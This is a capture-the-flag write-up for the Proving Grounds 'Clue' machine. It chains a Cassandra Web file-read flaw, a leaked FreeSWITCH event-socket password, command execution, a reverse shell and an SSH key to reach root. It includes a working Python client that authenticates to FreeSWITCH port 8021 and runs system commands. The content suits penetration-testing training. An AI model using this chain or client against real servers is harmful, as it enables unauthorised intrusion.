Clue - Proving Grounds Practice
Enumeration
Nmap
The initial Nmap scan showed SSH, HTTP and SMB open, along with ports 3000 and 8021.
WEB Enumeration
At first I checked the website on port 80, but it only returned a Forbidden page.
Port 3000 was running Cassandra Web.
Exploitation
LFI in Cassandra Web
I searched for Cassandra Web exploits and found one for remote file read, a path traversal in the web interface. (Exploit)
I tried to read /etc/passwd and it worked.
Then I read /proc/self/cmdline, which is the command line of the process serving the request. It contained a password, which I noted.
FreeSWITCH Command Execution
Port 8021 turned out to be the FreeSWITCH event socket (ESL). I searched for FreeSWITCH pentesting and found this blog.
I tried the default password it suggested (ClueCon), but it did not work.
SMB Null Session
SMB allowed a null session.
I listed all the files and looked for event_socket.conf.xml, the file in which FreeSWITCH stores the event socket password, and found it.
I downloaded and read it, but it only contained the default password, so it was not useful.
Cassandra Web LFI to Read the FreeSWITCH Password
I went back to the Cassandra Web exploit and read event_socket.conf.xml directly from the live system instead of relying on the backup copy on SMB. It contained a different password: the backup was stale, and only the running config held the real one.
I tried that password against port 8021 and it worked.
FreeSWITCH Command Execution
I downloaded a script that runs commands through the event socket.
I updated it with the correct password.
Then I ran it and it worked.
Later I ran a reverse shell. Note that the listener had to run on the same port as the server (8021) for the connection back to succeed.
That gave me a shell.
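The command-execution step, as an added example that is not the script the post downloaded: a minimal ESL client that completes the auth exchange on TCP/8021 with the password recovered from event_socket.conf.xml and then issues `api system <cmd>`, which mod_event_socket executes on the host. The fake ESL server at the bottom is constructed only so the client can be run and checked offline; the greeting, `auth`, `+OK`/`-ERR` reply and `api/response` framing follow the real protocol.

```python
"""Minimal FreeSWITCH Event Socket Layer (ESL) client for TCP/8021.

Added example, not the script downloaded in the post. With the password from
event_socket.conf.xml it authenticates and runs `api system <cmd>`, which
mod_event_socket executes on the host. The fake ESL server at the bottom is
constructed only so the client can be run and checked offline.
"""
import socket
import threading

ESL_PORT = 8021


def _read_until_blank(sock):
    """Return (text before the first blank line, leftover bytes)."""
    buf = b""
    while b"\n\n" not in buf:
        chunk = sock.recv(4096)
        if not chunk:
            raise ConnectionError("ESL peer closed the connection")
        buf += chunk
    head, rest = buf.split(b"\n\n", 1)
    return head.decode(errors="replace"), rest


def read_message(sock):
    """Parse one ESL message: 'Name: value' headers, a blank line, then a body
    of Content-Length bytes when that header is present."""
    head, rest = _read_until_blank(sock)
    headers = {}
    for line in head.splitlines():
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    length = int(headers.get("Content-Length", 0))
    while len(rest) < length:
        chunk = sock.recv(4096)
        if not chunk:
            break
        rest += chunk
    return headers, rest[:length].decode(errors="replace")


def run_command(host, port, password, command, timeout=10):
    """Authenticate, send `api <command>` and return its output.
    Raises PermissionError when the password is rejected (-ERR reply)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        headers, _ = read_message(sock)
        if headers.get("Content-Type") != "auth/request":
            raise ConnectionError(f"not an ESL greeting: {headers}")
        sock.sendall(f"auth {password}\n\n".encode())
        headers, _ = read_message(sock)
        if not headers.get("Reply-Text", "").startswith("+OK"):
            raise PermissionError(headers.get("Reply-Text", "auth failed"))
        sock.sendall(f"api {command}\n\n".encode())
        _, body = read_message(sock)
        return body


def start_fake_esl(password, responses):
    """Constructed stand-in for mod_event_socket (serves one connection).
    `responses` maps an api command to the output to return. Returns the port."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def serve():
        conn, _ = srv.accept()
        srv.close()
        with conn:
            conn.sendall(b"Content-Type: auth/request\n\n")
            req, _ = _read_until_blank(conn)
            if req != f"auth {password}":
                conn.sendall(b"Content-Type: command/reply\n"
                             b"Reply-Text: -ERR invalid\n\n")
                return
            conn.sendall(b"Content-Type: command/reply\n"
                         b"Reply-Text: +OK accepted\n\n")
            req, _ = _read_until_blank(conn)
            cmd = req[4:] if req.startswith("api ") else ""
            out = responses.get(cmd, f"-ERR {cmd} Command not found!\n").encode()
            conn.sendall(b"Content-Type: api/response\n"
                         b"Content-Length: %d\n\n" % len(out) + out)

    threading.Thread(target=serve, daemon=True).start()
    return port


if __name__ == "__main__":
    import sys
    # usage: python3 esl_exec.py <target> <password> system id
    target, password, *cmd = sys.argv[1:]
    print(run_command(target, ESL_PORT, password, " ".join(cmd)), end="")
```

The check in `run_command` on `Reply-Text` is what distinguishes the stale backup password from the live one: with the SMB copy's value the server answers `-ERR invalid` and the client stops, while the value read from the running config gets `+OK accepted` and the `api system` call runs as the freeswitch user.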
I could not find the user flag at first, so I ran a find command, which located it in the freeswitch directory.
Privilege Escalation
Su to cassie
We already had a password for cassie (the one from /proc/self/cmdline), and linpeas also showed it. I used it with su and obtained the cassie user.
id_rsa
The cassie user had an id_rsa file in her home directory.
I tried it over SSH as root and it worked.